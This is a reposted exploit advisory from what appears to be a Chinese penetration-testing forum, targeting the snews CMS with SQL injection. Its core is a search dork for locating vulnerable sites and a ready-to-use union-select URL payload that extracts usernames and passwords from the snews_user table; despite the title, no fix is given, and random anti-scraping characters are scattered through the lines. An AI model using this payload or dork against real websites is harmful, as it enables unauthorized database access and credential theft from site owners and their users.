中国网络渗透测试联盟

标题: CMS snews SQL注射及修复 [打印本页]

作者: admin    时间: 2013-1-23 08:55
标题: CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability0 n; S1 w2 }- m; ~) |2 `
作者: By onestree
& ]% `4 a- a3 f. a下载地址 : http://snewscms.com/6 r: L$ A. M8 Y
测试平台 : ubuntu 12.10 / win 71 J4 ~0 i' D& A& o+ C; T3 i
关键词: inurl:"tanyakan pada rumput yang bergoyang"7 T+ L0 l6 S! K7 X! o
* `5 o$ c. C' _* H) Q6 n
5 C. v  h& `. T- ?
*************************************************************
- H$ @1 |# ?7 N6 o+ A9 Y ( L' O4 Q) i% S. _& M: W* Y# I
SQL poc:
: N( ?! P& `6 U) i& P5 D : {6 M% z( L4 M0 n* C. c9 u
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]
  f* k$ S: ]" S* E3 F/ r ) \, }" s: d8 m
示例4 T2 {% f$ c* d4 u2 |. N2 P

; y* J9 b) {4 t' i$ Z1 @http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
! p% b9 e! P5 W  b
5 R- t, g0 u2 X) [0 v/ r! w( \1 N
8 u  h/ s( G' _) a! Z' X* V致谢:
4 Y" [8 i# ^- Q; y! ? 5 |. l' r5 b* w4 ^9 |4 s
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
, }- g$ A2 w' B8 R( {# [  @     
. \1 \8 g" \/ Q& l/ l$ W          indonesiancoder - moeslimh4x0r - go-coder
& k# e3 k8 z$ T8 C
; y1 D0 p7 r  V5 Z1 D" t' x+ Rspesial my hunny :*6 ]# W  P' R7 U2 \4 }# y7 l





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2